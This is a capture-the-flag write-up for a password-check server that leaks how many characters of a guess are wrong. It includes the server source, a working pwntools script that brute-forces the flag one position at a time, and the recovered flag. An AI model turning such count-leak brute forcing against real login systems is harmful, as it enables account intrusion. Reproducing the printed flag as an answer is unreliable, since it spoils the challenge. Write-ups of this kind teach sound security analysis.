Playing Hacks and Stuffs!
We are given the server source code:

#!/usr/bin/env python3

def main():
    flag = open("flag.txt").read()
    while True:
        pwd = input("Enter your password: ").ljust(len(flag))
        if pwd == "exit":
            exit()
        count = sum(pwd[i] != c for i, c in enumerate(flag))
        if count == 0:
            print("Logged in successfully!")
            exit()
        else:
            print(f"Close! You're just {count} character{'s' if count else ''} off of your password.")

if __name__ == '__main__':
    main()
Basically what that does is: read the flag from flag.txt, pad whatever we type with spaces up to the flag's length, count the positions where our input and the flag differ, and print that count back to us. A count of zero means "Logged in successfully!". The count is the whole bug: it tells us, per guess, how many positions are still wrong, so each position can be attacked on its own instead of guessing the whole password at once.
Let me show what I mean
I hosted that on port 1234:
socat tcp-l:1234,reuseaddr,fork EXEC:"python3 server.py"
Now I can connect to it.
In my current directory I created a test flag.
With an empty guess the count we get back is the length of the flag (every padded space mismatches, unless the flag itself contains spaces). If we put the right character in the next position, that count drops by one; a wrong character leaves it unchanged.
So we have a way of brute forcing the password one position at a time: about len(charset) * len(flag) guesses instead of len(charset) ** len(flag).
I wrote a script to do that for me:

from pwn import *
import string

context.log_level = 'info'

io = remote('localhost', 1234)

# Whitespace is left out: a newline in a guess would desync the line-based
# protocol, and a space can never change the count because the server pads
# with spaces anyway.
charset = string.digits + string.ascii_letters + string.punctuation
flag = ''

# The flag is 31 characters long, so an empty guess is reported as 31 off;
# every correct character we add lowers the reported count by one.
for i in range(31, 0, -1):
    found = False
    for c in charset:
        io.sendline((flag + c).encode())
        response = io.recvline()
        expected_response = "Close! You're just {} characters".format(i)
        # If the count did not stay at i, the character at this position is right
        # (the last one is answered with "Logged in successfully!" instead)
        if expected_response.encode() not in response:
            flag += c
            found = True
            break
    if not found:
        print("Flag character not found, check if assumptions are correct.")
        break

log.info(f'Flag: {flag}')
Running it worked.
Cool, I also ran it remotely and got the flag:
Flag: ictf{customer_service_ftw_0d2f}